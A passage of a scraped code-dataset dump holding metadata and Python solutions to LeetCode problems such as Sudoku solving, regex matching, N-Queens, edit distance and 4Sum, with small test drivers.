"license_type": "no_license",
"max_line_length": 106,
"num_lines": 33,
"path": "/Rotate Image.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param matrix, a list of lists of integers\n # @return a list of lists of integers\n def rotate(self, matrix):\n '''\n You are given an n x n 2D matrix representing an image.\n\nRotate the image by 90 degrees (clockwise).\n\nFollow up:\nCould you do this in-place?\n '''\n n = len(matrix)\n l = 0\n r = n\n while r - l > 1:\n for i in range(l, r - 1):\n matrix[l][i], matrix[i][r - 1], matrix[r - 1][r - 1 - i + l], matrix[r - 1 - i + l][l] = \\\n matrix[r - 1 - i + l][l], matrix[l][i], matrix[i][r - 1], matrix[r - 1][r - 1 - i + l]\n l += 1\n r -= 1\n return matrix\n\nn = 10\nm = []\nfor i in range(n):\n m.append([i * n + j + 1 for j in range(n)])\nfor i in range(len(m)):\n print(m[i])\nres = Solution.rotate(Solution(), m)\nprint()\nfor i in range(len(res)):\n print(res[i])\n"
},
{
"alpha_fraction": 0.42497318983078003,
"alphanum_fraction": 0.44694533944129944,
"avg_line_length": 30.108333587646484,
"blob_id": "05960c8a1a20891048386c382e0c9ddfd75b7434",
"content_id": "e74041add7dafe2c07c752423723a489089e130e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3732,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 120,
"path": "/Sudoku Solver.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param board, a 9x9 2D array\n # Solve the Sudoku by modifying the input board in-place.\n # Do not return any value.\n def solveSudoku(self, board):\n '''\n Write a program to solve a Sudoku puzzle by filling the empty cells.\n\nEmpty cells are indicated by the character '.'.\n\nYou may assume that there will be only one unique solution.\n\n\nA sudoku puzzle...\n\n\n...and its solution numbers marked in red. \n '''\n row = [set() for i in range(9)]\n col = [set() for i in range(9)]\n cube = [set() for i in range(9)]\n blanks = []\n for i in range(9):\n for j in range(9):\n x = board[i][j]\n k = i // 3 * 3 + j // 3\n if x == '.':\n blanks.append([i, j, k])\n continue\n row[i].add(x)\n col[j].add(x)\n cube[k].add(x)\n self.dfs(board, blanks, 0, row, col, cube)\n\n def dfs(self, board, blanks, ith, row, col, cube):\n if ith == len(blanks):\n return True\n x, y, k = blanks[ith]\n for i in range(1, 10):\n c = chr(ord('0') + i)\n if c in row[x] or c in col[y] or c in cube[k]:\n continue\n row[x].add(c)\n col[y].add(c)\n cube[k].add(c)\n board[x][y] = c\n res = self.dfs(board, blanks, ith + 1, row, col, cube)\n if res:\n return True\n board[x][y] = '.'\n row[x].remove(c)\n col[y].remove(c)\n cube[k].remove(c)\n\n # @param board, a 9x9 2D array\n # Solve the Sudoku by modifying the input board in-place.\n # Do not return any value.\n def solveSudoku_usingArray(self, board):\n '''\n Write a program to solve a Sudoku puzzle by filling the empty cells.\n\nEmpty cells are indicated by the character '.'.\n\nYou may assume that there will be only one unique solution.\n\n\nA sudoku puzzle...\n\n\n...and its solution numbers marked in red.\n '''\n row = [[False] * 10 for i in range(9)]\n col = [[False] * 10 for i in range(9)]\n cube = [[False] * 10 for i in range(9)]\n blanks = []\n for i in range(9):\n for j in range(9):\n x = ord(board[i][j]) - ord('0')\n k = i // 3 * 3 + j // 3\n if board[i][j] == '.':\n blanks.append([i, j, k])\n continue\n row[i][x] = True\n col[j][x] = True\n cube[k][x] = True\n self.dfs_usingArray(board, blanks, 0, row, col, cube)\n\n def dfs_usingArray(self, board, blanks, ith, row, col, cube):\n if ith == len(blanks):\n return True\n x, y, k = blanks[ith]\n for i in range(1, 10):\n c = chr(ord('0') + i)\n if row[x][i] or col[y][i] or cube[k][i]:\n continue\n row[x][i] = True\n col[y][i] = True\n cube[k][i] = True\n board[x][y] = c\n res = self.dfs(board, blanks, ith + 1, row, col, cube)\n if res:\n return True\n board[x][y] = '.'\n row[x][i] = False\n col[y][i] = False\n cube[k][i] = False\n\na0 = [\"....9..9.\",\".........\",\"4..89...1\",\"4.3......\",\".........\",\"...5..9..\",\"....1.7..\",\"...4.....\",\".....6...\"]\na1 = [\".87654321\",\"2........\",\"3........\",\"4........\",\"5........\",\"6........\",\"7........\",\"8........\",\"9........\"]\na2 = []\nfor i in range(9):\n a2.append([])\n for j in range(9):\n a2[i].append(a0[i][j])\na = a2\nfor i in range(9):\n print(a[i])\nprint(Solution.solveSudoku(Solution(), a))\nfor i in range(9):\n print(a[i])"
},
{
"alpha_fraction": 0.4754098355770111,
"alphanum_fraction": 0.4888226389884949,
"avg_line_length": 24.30188751220703,
"blob_id": "97e1f2fc8ac7173c00ae50d9e4a333cf272da9b6",
"content_id": "4a5077cdc4b8e6f4f0be659c9028d9fda29d2849",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1348,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 53,
"path": "/Reverse Linked List II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n # @param head, a ListNode\n # @param m, an integer\n # @param n, an integer\n # @return a ListNode\n def reverseBetween(self, head, m, n):\n '''\n Reverse a linked list from position m to n. Do it in-place and in one-pass.\n\nFor example:\nGiven 1->2->3->4->5->NULL, m = 2 and n = 4,\n\nreturn 1->4->3->2->5->NULL.\n\nNote:\nGiven m, n satisfy the following condition:\n1 ≤ m ≤ n ≤ length of list. \n '''\n dummyHead = ListNode(0)\n dummyHead.next = head\n postPre = None\n preTail = None\n revHead = None\n t = dummyHead\n k = 0\n while k < n:\n if k == m - 1:\n preTail = t\n revHead = t.next\n k += 1\n t = t.next\n postPre = t.next\n t.next = None\n def reverseList(head):\n pre = None\n tail = head\n while head:\n t = head\n head = head.next\n t.next = pre\n pre = t\n return [pre, tail]\n revHead, revTail = reverseList(revHead)\n preTail.next = revHead\n revTail.next = postPre\n return dummyHead.next\n\n"
},
{
"alpha_fraction": 0.41695302724838257,
"alphanum_fraction": 0.4272623062133789,
"avg_line_length": 29.10344886779785,
"blob_id": "68bce2e33a55fe79af4dd7d66b4365d147e29953",
"content_id": "318e4cc33c7534f714f21fe8c9734e79ba2ac418",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 873,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 29,
"path": "/Remove Element.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A a list of integers\n # @param elem an integer, value need to be removed\n # @return an integer\n def removeElement(self, A, elem):\n '''\n Given an array and a value, remove all instances of that value in place and return the new length.\n\nThe order of elements can be changed. It doesn't matter what you leave beyond the new length. \n '''\n if len(A) == 0:\n return 0\n l = 0\n r = len(A) - 1\n while l < r:\n while l < r and A[l] != elem:\n l += 1\n while l < r and A[r] == elem:\n r -= 1\n if l < r:\n t = A[l]\n A[l] = A[r]\n A[r] = t\n l += 1\n r -= 1\n res = r + 1\n if A[r] == elem:\n res = r\n return res\n"
},
{
"alpha_fraction": 0.48554033041000366,
"alphanum_fraction": 0.509132444858551,
"avg_line_length": 26.39583396911621,
"blob_id": "dc6b10cc6f80b5d21cf1bfd2223a89b550dca0f2",
"content_id": "517136a78c838c89a182a861438b1b795576472e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1314,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 48,
"path": "/Jump Game II.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A, a list of integers\n # @return an integer\n def jump(self, A):\n '''\n Given an array of non-negative integers, you are initially positioned at the first index of the array.\n\nEach element in the array represents your maximum jump length at that position.\n\nYour goal is to reach the last index in the minimum number of jumps.\n\nFor example:\nGiven array A = [2,3,1,1,4]\n\nThe minimum number of jumps to reach the last index is 2. (Jump 1 step from index 0 to 1, then 3 steps to the last index.) \n '''\n return self.on_solution(A)\n #return self.dp_solution(A)\n\n def on_solution(self, A):\n n = len(A)\n l = 0\n r = 1\n step = 0\n while r < n:\n nextr = -1\n for i in range(l, r):\n if A[i] + i > nextr:\n nextr = A[i] + i\n l = r\n r = nextr + 1\n step += 1\n return step\n\n #TLE\n def dp_solution(self, A):\n dp = [len(A)] * len(A)\n dp[0] = 0\n for i in range(1, len(A)):\n for j in range(i - 1, -1, -1):\n if A[j] + j >= i:\n dp[i] = min(dp[i], dp[j] + 1)\n return dp[len(A) - 1]\n\na1 = [1,2,1,1,1]\na = a1\nprint(a)\nprint(Solution.dp_solution(Solution(), a))"
},
{
"alpha_fraction": 0.45378151535987854,
"alphanum_fraction": 0.4789915978908539,
"avg_line_length": 32.65217208862305,
"blob_id": "5eadc14adae554e5cdea5537b4129896c5d138a1",
"content_id": "f867495cd21a7046a59c37615c7370e03b6b4580",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1561,
"license_type": "no_license",
"max_line_length": 137,
"num_lines": 46,
"path": "/Regular Expression Matching.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding=utf-8\nclass Solution:\n # @return a boolean\n def isMatch(self, s, p):\n \"\"\"\n Implement regular expression matching with support for '.' and '*'.\n\n'.' Matches any single character.\n'*' Matches zero or more of the preceding element.\n\nThe matching should cover the entire input string (not partial).\n\nThe function prototype should be:\nbool isMatch(const char *s, const char *p)\n\nSome examples:\nisMatch(\"aa\",\"a\") → false\nisMatch(\"aa\",\"aa\") → true\nisMatch(\"aaa\",\"aa\") → false\nisMatch(\"aa\", \"a*\") → true\nisMatch(\"aa\", \".*\") → true\nisMatch(\"ab\", \".*\") → true\nisMatch(\"aab\", \"c*a*b\") → true\n \"\"\"\n n = len(s)\n m = len(p)\n match = [[False] * (m + 1) for row in range(n + 1)]\n match[0][0] = True\n for i in range(0, n + 1):\n for j in range(0, m + 1):\n if i > 0 or j > 0:\n match[i][j] = (i >= 1 and j >= 1 and match[i - 1][j - 1] and self.matchSingle(s[i - 1], p[j - 1])) \\\n or (i >= 1 and j >= 2 and match[i - 1][j] and p[j - 1] == '*' and self.matchSingle(s[i - 1], p[j - 2])) \\\n or (j >= 1 and match[i][j - 1] and p[j - 1] == '*') \\\n or (j >= 2 and match[i][j - 2] and p[j - 1] == '*')\n #print(i, j, s[:i], p[:j], match[i][j])\n return match[n][m]\n\n def matchSingle(self, s1, s2):\n return s1 == s2 or s2 == '.'\n\ns1 = [\"aaa\", \".*\"]\ns2 = [\"aab\", \"c*a*b\"]\ns = s2\nprint(s)\nprint(Solution.isMatch(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.420634925365448,
"alphanum_fraction": 0.4334554374217987,
"avg_line_length": 26.779661178588867,
"blob_id": "be231f3b7dc1c1d1dc1291f262f3e0775b37ecd5",
"content_id": "721bea38311adeb0d6d26f8d21cf66f66563a9f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1639,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 59,
"path": "/N-Queens.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "#coding:utf-8\nclass Solution:\n # @return a list of lists of string\n def solveNQueens(self, n):\n '''\n The n-queens puzzle is the problem of placing n queens on an n×n chessboard such that no two queens attack each other.\n\nGiven an integer n, return all distinct solutions to the n-queens puzzle.\n\nEach solution contains a distinct board configuration of the n-queens' placement, where 'Q' and '.' both indicate a queen and an empty space respectively.\n\nFor example,\nThere exist two distinct solutions to the 4-queens puzzle:\n\n[\n [\".Q..\", // Solution 1\n \"...Q\",\n \"Q...\",\n \"..Q.\"],\n\n [\"..Q.\", // Solution 2\n \"Q...\",\n \"...Q\",\n \".Q..\"]\n]\n '''\n def dfs(ith, n, lr, rl, ud, now, res):\n if ith == n:\n so = []\n for i in range(n):\n s = ''\n for j in range(n):\n if j == now[i] - 1:\n s += 'Q'\n else:\n s += '.'\n so.append(s)\n res.append(so)\n return\n ones = (1 << n) - 1\n for i in range(1, n + 1):\n k = 1 << (n - i)\n if (k & lr) + (k & rl) + (k & ud) > 0:\n continue\n now.append(i)\n dfs(ith + 1, n, (lr | k) >> 1, ((rl | k) << 1) & ones, ud | k, now, res)\n now.pop()\n res = []\n dfs(0, n, 0, 0, 0, [], res)\n return res\n\nn1 = 6\nn = n1\nprint(n)\nres = Solution.solveNQueens(Solution(), n)\nfor so in res:\n for s in so:\n print(s)\n print('')"
},
{
"alpha_fraction": 0.4683544337749481,
"alphanum_fraction": 0.5134493708610535,
"avg_line_length": 27.75,
"blob_id": "2d4e5e7680e46e2d7571c0894fac8fa29403c24e",
"content_id": "e631b0597dc80dfea58a423bf97f85e30ef9595f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1264,
"license_type": "no_license",
"max_line_length": 187,
"num_lines": 44,
"path": "/Trapping Rain Water.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param A, a list of integers\n # @return an integer\n def trap(self, A):\n '''\n Given n non-negative integers representing an elevation map where the width of each bar is 1, compute how much water it is able to trap after raining.\n\nFor example,\nGiven [0,1,0,2,1,0,1,3,2,1,2,1], return 6.\n\n\nThe above elevation map is represented by array [0,1,0,2,1,0,1,3,2,1,2,1]. In this case, 6 units of rain water (blue section) are being trapped. Thanks Marcos for contributing this image!\n '''\n n = len(A)\n area = 0\n maxi = -1\n maxv = -1\n for i in range(n):\n if A[i] > maxv:\n maxi = i\n maxv = A[i]\n area += self.findarea(A, maxi)\n A.reverse()\n area += self.findarea(A, n - maxi - 1)\n return area\n\n def findarea(self, A, maxi):\n if len(A) == 0:\n return 0\n thishigh = A[0]\n i = 0\n area = 0\n while i < maxi:\n while i < maxi and A[i] <= thishigh:\n area += thishigh - A[i]\n i += 1\n thishigh = A[i]\n return area\n\na0 = [0,1,0,2,1,0,1,3,2,1,2,1]\na1 = [5,2,1,2,1,5]\na = []\nprint(len(a), a)\nprint(Solution.trap(Solution(), a))"
},
{
"alpha_fraction": 0.4570673704147339,
"alphanum_fraction": 0.4689564108848572,
"avg_line_length": 28.705883026123047,
"blob_id": "ac3516fc79d8951b31706cb2eca931d4e862e30e",
"content_id": "fa857b9a54f4d8c53974893199af47c904ccdf1a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1514,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 51,
"path": "/Palindrome Partitioning.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param s, a string\n # @return a list of lists of string\n def partition(self, s):\n ''' Given a string s, partition s such that every substring of the partition is a palindrome.\n\nReturn all possible palindrome partitioning of s.\n\nFor example, given s = \"aab\",\nReturn\n\n [\n [\"aa\",\"b\"],\n [\"a\",\"a\",\"b\"]\n ]\n'''\n n = len(s)\n is_palindrome = [[False] * n for row in range(n)]\n for pos in range(0, n):\n l = 0\n while pos - l >= 0 and pos + l <= n - 1 and s[pos - l] == s[pos + l]:\n is_palindrome[pos - l][pos + l] = True\n l += 1\n l = 0\n while pos - l - 1 >= 0 and pos + l <= n - 1 and s[pos - l - 1] == s[pos + l]:\n is_palindrome[pos - l - 1][pos + l] = True\n l += 1\n cuts = list(range(n + 1))\n cuts[n] = []\n for i in range(n - 1, -1, -1):\n cuts[i] = []\n for j in range(i, n):\n if is_palindrome[i][j]:\n cuts[i].append(j + 1)\n reslist = []\n self.dfs(s, reslist, cuts, [], 0, n)\n return reslist\n\n def dfs(self, s, reslist, cuts, curres, pos, n):\n if pos == n:\n reslist.append(list(curres))\n return\n for nextpos in cuts[pos]:\n curres.append(s[pos:nextpos])\n self.dfs(s, reslist, cuts, curres, nextpos, n)\n curres.pop()\n\ns = ''\nprint(len(s))\nprint(s)\nprint(Solution.partition(Solution(), s))"
},
{
"alpha_fraction": 0.45856353640556335,
"alphanum_fraction": 0.48895028233528137,
"avg_line_length": 30.97058868408203,
"blob_id": "a43021e2377f8f210c4d6d4c2cf29ed3e883bea6",
"content_id": "b1c82faadda0e7dd83c108ac435657742c67a26c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1086,
"license_type": "no_license",
"max_line_length": 222,
"num_lines": 34,
"path": "/3Sum Closest.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return an integer\n def threeSumClosest(self, num, target):\n '''\n Given an array S of n integers, find three integers in S such that the sum is closest to a given number, target. Return the sum of the three integers. You may assume that each input would have exactly one solution.\n\n For example, given array S = {-1 2 1 -4}, and target = 1.\n\n The sum that is closest to the target is 2. (-1 + 2 + 1 = 2).\n\n '''\n if len(num) < 3:\n return target\n num.sort()\n res = num[0] + num[1] + num[2]\n for i in range(len(num) - 2):\n j = i + 1\n k = len(num) - 1\n while j < k:\n x = num[i] + num[j] + num[k]\n if abs(target - x) < abs(target - res):\n res = x\n if x < target:\n j += 1\n else:\n k -= 1\n return res\n\nnum1 = [-1, 0, 1, 2, -1, -4]\nnum2 = [-1, 2, 1, -4]\nnum = num2\nprint(len(num), num)\nres = Solution.threeSumClosest(Solution(), num, 1)\nprint(res)"
},
{
"alpha_fraction": 0.4935683608055115,
"alphanum_fraction": 0.5021438598632812,
"avg_line_length": 26.259740829467773,
"blob_id": "10bc06ef7738bd62fc2a3cc65249b2d93d046620",
"content_id": "c99cc2d556a48b6002bedffd117d50e70434586f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2099,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 77,
"path": "/Binary Tree Inorder Traversal.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nclass Solution:\n '''Given a binary tree, return the inorder traversal of its nodes' values.\n\nFor example:\nGiven binary tree {1,#,2,3},\n\n 1\n \\\n 2\n /\n 3\n\nreturn [1,3,2].\n\nNote: Recursive solution is trivial, could you do it iteratively?\n\nconfused what \"{1,#,2,3}\" means? > read more on how binary tree is serialized on OJ.'''\n def inorderTraversal(self, root):\n return self.inorderTraversal_Morris(root)\n\n def __init__(self):\n self.l = []\n\n # @param root, a tree node\n # @return a list of integers\n def inorderTraversal_Recursive(self, root):\n if root is None:\n return []\n self.inorderTraversal(root.left)\n self.l.append(root.val)\n self.inorderTraversal(root.right)\n return self.l\n\n def inorderTraversal_Stack(self, root):\n if root is None:\n return []\n stack = [[root, 0]]\n l = []\n while len(stack) > 0:\n node, state = stack.pop()\n if state == 1:\n l.append(node.val)\n continue\n if node.right:\n stack.append([node.right, 0])\n stack.append([node, 1])\n if node.left:\n stack.append([node.left, 0])\n return l\n\n def inorderTraversal_Morris(self, root):\n if root is None:\n return []\n l = []\n cur = root\n while cur:\n if cur.left:\n rightmost = cur.left\n while rightmost.right and rightmost.right != cur:\n rightmost = rightmost.right\n if not rightmost.right:\n rightmost.right = cur\n cur = cur.left\n else:\n l.append(cur.val)\n cur = cur.right\n rightmost.right = None\n else:\n l.append(cur.val)\n cur = cur.right\n return l\n"
},
{
"alpha_fraction": 0.4318321943283081,
"alphanum_fraction": 0.4466378688812256,
"avg_line_length": 27.928571701049805,
"blob_id": "bbe0de93b67054db48ab04abb1ee6a20f4679330",
"content_id": "516ed04a7dce229dc9ce7d978642539864bc67b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1621,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 56,
"path": "/Minimum Window Substring.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a string\n def minWindow(self, S, T):\n '''\n Given a string S and a string T, find the minimum window in S which will contain all the characters in T in complexity O(n).\n\nFor example,\nS = \"ADOBECODEBANC\"\nT = \"ABC\"\n\nMinimum window is \"BANC\".\n\nNote:\nIf there is no such window in S that covers all characters in T, return the emtpy string \"\".\n\nIf there are multiple such windows, you are guaranteed that there will always be only one unique minimum window in S. \n '''\n if T == '':\n return ''\n countT = {}\n for c in T:\n if c not in countT:\n countT[c] = 0\n countT[c] += 1\n n = len(countT)\n countLR = {}\n for c in countT:\n countLR[c] = 0\n l, r = 0, 0\n min_count = len(S) + 1\n min_window = ''\n while True:\n while n > 0 and r < len(S):\n if S[r] in countLR:\n countLR[S[r]] += 1\n if countLR[S[r]] == countT[S[r]]:\n n -= 1\n r += 1\n if n != 0:\n break\n while n == 0:\n if S[l] in countLR:\n countLR[S[l]] -= 1\n if countLR[S[l]] == countT[S[l]] - 1:\n n += 1\n l += 1\n if r - l + 1 < min_count:\n min_window = S[l - 1:r]\n min_count = r - l + 1\n return min_window\n\ns1 = [\"ADOBECODEBANC\", \"ABC\"]\ns2 = ['aa', 'aa']\ns = s2\nprint(s)\nprint(Solution.minWindow(Solution(), s[0], s[1]))\n\n"
},
{
"alpha_fraction": 0.4005201458930969,
"alphanum_fraction": 0.4109232723712921,
"avg_line_length": 32.434783935546875,
"blob_id": "d77fb432035507986c88c32190ab5e9a81bc3f89",
"content_id": "8a02778f646624ffdf452694847762d2d1987f64",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 769,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 23,
"path": "/Valid Parentheses.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a boolean\n def isValid(self, s):\n '''\n Given a string containing just the characters '(', ')', '{', '}', '[' and ']', determine if the input string is valid.\n\nThe brackets must close in the correct order, \"()\" and \"()[]{}\" are all valid but \"(]\" and \"([)]\" are not.\n '''\n ldic = {'(': 1, '[': 2, '{': 4}\n rdic = {')': -1, ']': -2, '}': -4}\n stack = []\n for c in s:\n if c in ldic:\n stack.append(ldic[c])\n else:\n if len(stack) == 0:\n return False\n x = stack.pop()\n if x != -rdic[c]:\n return False\n if len(stack) > 0:\n return False\n return True\n"
},
{
"alpha_fraction": 0.5192096829414368,
"alphanum_fraction": 0.537870466709137,
"avg_line_length": 30.44827651977539,
"blob_id": "ead3278e1e4106c68468dc6e91b2f1bcf71de5a4",
"content_id": "1e34464c86ecc3be91450fdb334bf709a2341d2e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 911,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 29,
"path": "/Word Break.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param s, a string\n # @param dict, a set of string\n # @return a boolean\n def wordBreak(self, s, dict):\n ''' Given a string s and a dictionary of words dict, determine if s can be segmented into a space-separated sequence of one or more dictionary words.\n\nFor example, given\ns = \"leetcode\",\ndict = [\"leet\", \"code\"].\n\nReturn true because \"leetcode\" can be segmented as \"leet code\". '''\n mlen = 0\n for word in dict:\n mlen = max(len(word), mlen)\n slen = len(s)\n dp = list(range(slen + 1))\n dp[slen] = True\n for i in range(slen - 1, -1, -1):\n dp[i] = False\n for j in range(i, min(i + mlen, slen)):\n dp[i] = dp[i] or (s[i:j + 1] in dict and dp[j + 1])\n return dp[0]\n\nA = ['1', '2', '3', '3', '2', '1', '4', '5', '4']\na = 'abcdefg'\nso = Solution()\nres = so.wordBreak(a, A)\nprint(res)"
},
{
"alpha_fraction": 0.4450101852416992,
"alphanum_fraction": 0.4887983798980713,
"avg_line_length": 31.766666412353516,
"blob_id": "4393a4f75bf2124e67d6ec95b7680a4228b65547",
"content_id": "9b5250e59708518504e008c531f37914a71930be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 982,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 30,
"path": "/Edit Distance.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return an integer\n def minDistance(self, word1, word2):\n '''\n Given two words word1 and word2, find the minimum number of steps required to convert word1 to word2. (each operation is counted as 1 step.)\n\nYou have the following 3 operations permitted on a word:\n\na) Insert a character\nb) Delete a character\nc) Replace a character\n '''\n n1 = len(word1)\n n2 = len(word2)\n dp = [[0] * (n2 + 1) for row in range(n1 + 1)]\n for i in range(0, n1 + 1):\n for j in range(0, n2 + 1):\n dp[i][j] = max(i, j)\n if i == 0 or j == 0:\n continue\n dp[i][j] = dp[i - 1][j - 1] + 1\n if word1[i - 1] == word2[j - 1]:\n dp[i][j] -= 1\n dp[i][j] = min(dp[i][j], dp[i - 1][j] + 1, dp[i][j - 1] + 1)\n return dp[n1][n2]\n\ns1 = ['ab', 'bc']\ns = s1\nprint(s)\nprint(Solution.minDistance(Solution(), s[0], s[1]))"
},
{
"alpha_fraction": 0.4578096866607666,
"alphanum_fraction": 0.4901256859302521,
"avg_line_length": 24.31818199157715,
"blob_id": "ce060a9e446961317f08a8972c767d6d83a963c8",
"content_id": "e722f7dc7c87c92841ae9aa4cefcfc53fe0c2f39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 557,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 22,
"path": "/Find Minimum in Rotated Sorted Array.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param num, a list of integer\n # @return an integer\n def findMin(self, num):\n '''\n Suppose a sorted array is rotated at some pivot unknown to you beforehand.\n\n(i.e., 0 1 2 4 5 6 7 might become 4 5 6 7 0 1 2).\n\nFind the minimum element.\n\nYou may assume no duplicate exists in the array.\n '''\n l = 0\n r = len(num) - 1\n while l < r:\n mid = (l + r) // 2\n if num[mid] < num[r]:\n r = mid\n else:\n l = mid + 1\n return num[l]\n"
},
{
"alpha_fraction": 0.5348297357559204,
"alphanum_fraction": 0.5603715181350708,
"avg_line_length": 32.153846740722656,
"blob_id": "e68da907ce4c90fa6d3e33362a9c0e9fc861482b",
"content_id": "2859858331654d341f41417a8c20026fde4ea2dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1292,
"license_type": "no_license",
"max_line_length": 190,
"num_lines": 39,
"path": "/Gas Station.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @param gas, a list of integers\n # @param cost, a list of integers\n # @return an integer\n def canCompleteCircuit(self, gas, cost):\n ''' There are N gas stations along a circular route, where the amount of gas at station i is gas[i].\n\nYou have a car with an unlimited gas tank and it costs cost[i] of gas to travel from station i to its next station (i+1). You begin the journey with an empty tank at one of the gas stations.\n\nReturn the starting gas station's index if you can travel around the circuit once, otherwise return -1.\n\nNote:\nThe solution is guaranteed to be unique. '''\n n = len(gas)\n start = 0\n cur = 0\n curlen = 0\n startcount = 1\n remain = 0\n while curlen < n and startcount <= n:\n remain += gas[cur] - cost[cur]\n while remain < 0:\n remain -= gas[start] - cost[start]\n start = (start + 1) % n\n startcount += 1\n curlen -= 1\n cur = (cur + 1) % n\n curlen += 1\n if cur == start and startcount <= n:\n return start\n else:\n return -1\n\nA = [1, 2, 3, 3, 2, 1, 4, 5, 4]\nA1 = [1, 2, 3]\nA2 = [2, 1, 4]\nso = Solution()\nres = so.canCompleteCircuit(A1, A2)\nprint(res)"
},
{
"alpha_fraction": 0.4172307550907135,
"alphanum_fraction": 0.44738462567329407,
"avg_line_length": 34.34782791137695,
"blob_id": "8a2d336b52f707161a4fd3f4d82c469a95ddf1bd",
"content_id": "09e70011914ee919032211dbd8cd6089815ff4d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1631,
"license_type": "no_license",
"max_line_length": 184,
"num_lines": 46,
"path": "/4Sum.py",
"repo_name": "KnightChan/LeetCode-Python",
"src_encoding": "UTF-8",
"text": "class Solution:\n # @return a list of lists of length 4, [[val1,val2,val3,val4]]\n def fourSum(self, num, target):\n '''\n Given an array S of n integers, are there elements a, b, c, and d in S such that a + b + c + d = target? Find all unique quadruplets in the array which gives the sum of target.\n\nNote:\n\n Elements in a quadruplet (a,b,c,d) must be in non-descending order. (ie, a ≤ b ≤ c ≤ d)\n The solution set must not contain duplicate quadruplets.\n\n For example, given array S = {1 0 -1 0 -2 2}, and target = 0.\n\n A solution set is:\n (-1, 0, 0, 1)\n (-2, -1, 1, 2)\n (-2, 0, 0, 2)\n '''\n n = len(num)\n num.sort()\n twoSumDic = {}\n for i in range(n - 1):\n for j in range(i + 1, n):\n x = num[i] + num[j]\n if x not in twoSumDic:\n twoSumDic[x] = []\n twoSumDic[x].append([num[i], num[j], i, j])\n resSet = set()\n for i in range(n - 1):\n for j in range(i + 1, n):\n x = target - (num[i] + num[j])\n if x in twoSumDic:\n for y in twoSumDic[x]:\n if y[3] == i or y[3] == j or y[2] == i or y[2] == j:\n continue\n a = [num[i], num[j], y[0], y[1]]\n a.sort()\n resSet.add((a[0], a[1], a[2], a[3]))\n res = []\n for a in resSet:\n res.append([a[i] for i in range(len(a))])\n return res\n\ns0 = [0, [1, 0, -1, 0, -2, 2]]\ns = s0\nprint(Solution.fourSum(Solution(), s[1], s[0]))"
},
{
"alpha_fraction": 0.5578842163085938,
"alphanum_fraction": 0.5858283638954163,
"avg_line_length": 26.86111068725586,
"blob_id": "011ad926dc8d1731773380e2828f45af4d97bdc4",
